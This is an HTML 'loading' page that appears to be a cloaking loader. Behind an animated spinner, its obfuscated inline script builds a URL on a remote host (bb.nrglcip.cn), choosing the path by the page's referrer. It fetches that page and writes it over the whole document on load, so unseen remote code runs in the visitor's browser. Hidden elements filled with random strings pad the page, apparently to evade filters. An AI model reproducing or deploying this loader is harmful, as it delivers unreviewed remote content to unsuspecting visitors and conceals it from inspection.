<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DodSDhJypea {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DodSDhJypea .aoKB8a8a {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DodSDhJypea .content {
            line-height: 50px;
            text-align: center
        }

        .DodSDhJypea .img {
            width: 100%
        }

        .DodSDhJypea .KPAMoyg {
            text-align: center
        }

        .DodSDhJypea .KPAMoyg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DodSDhJypea .KPAMoyg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DodSDhJypea .KPAMoyg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DodSDhJypea .KPAMoyg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DodSDhJypea .KPAMoyg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DodSDhJypea .KPAMoyg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DodSDhJypea .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XxQBlN99tr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ibAu0B7 = XxQBlN99tr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ibAu0B7 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ibAu0B7 +".html?a=share";
		}
		
        gMT0hRxqR=url+"#"+new Date().getTime();
        gMT0hRxqR && function() {
            $.get(gMT0hRxqR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >bRXcRwoOgvIRuxa1t4GKvQkm8NUc6b8ryGOSgoyqnHWRVWBMOK6Ne2stU4JIf6VyB4</h1>
<li style='display:none' >gaEy5xVdmVv50UUrzYQbP6GwIzXKSZmHb2nSb6XAzLTjlysHfnAJktgAkT9PYslafBzR3qmW6B6vdJnwJK6nToi0GoBczE7guxV</li>
<ul style='display:none' >kdXWasZyPTU2GqdqbCM73qjbQz0xPARASoUgUSYJQ4uT5BC2Ld2pYX4YrDogO3fQ471k2rwJyR1FYQi</ul><div class="DodSDhJypea">
    <div class="aoKB8a8a">
        <div class="KPAMoyg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>sZ34krB7GNHG85tjyr9fdNhaeM</p>
<b style='display:none' >mSY84BRzhcRGrnUxeSQWazziAZKSaVRD1HV5FfYLRiCmRjyRiPSozxu4YyKiP</b>
<p  style='display:none'>sZ34krB7GNHG85tjyr9fdNhaeM</p>
<span style='display:none'>jzIE9uGL4oP51PP</span>
<p  style='display:none'>sZ34krB7GNHG85tjyr9fdNhaeM</p>
<img  src='' style='display:none'>
<h1 style='display:none' >qYhb4nZtGsWg0kKX27pwBqHkxtid4tA7RU2mtzsND7AkRq9x5vOGEUeVhqu48KTz5dQnGyJ1oA8AJ6BxMUkbwf</h1></body>
</html>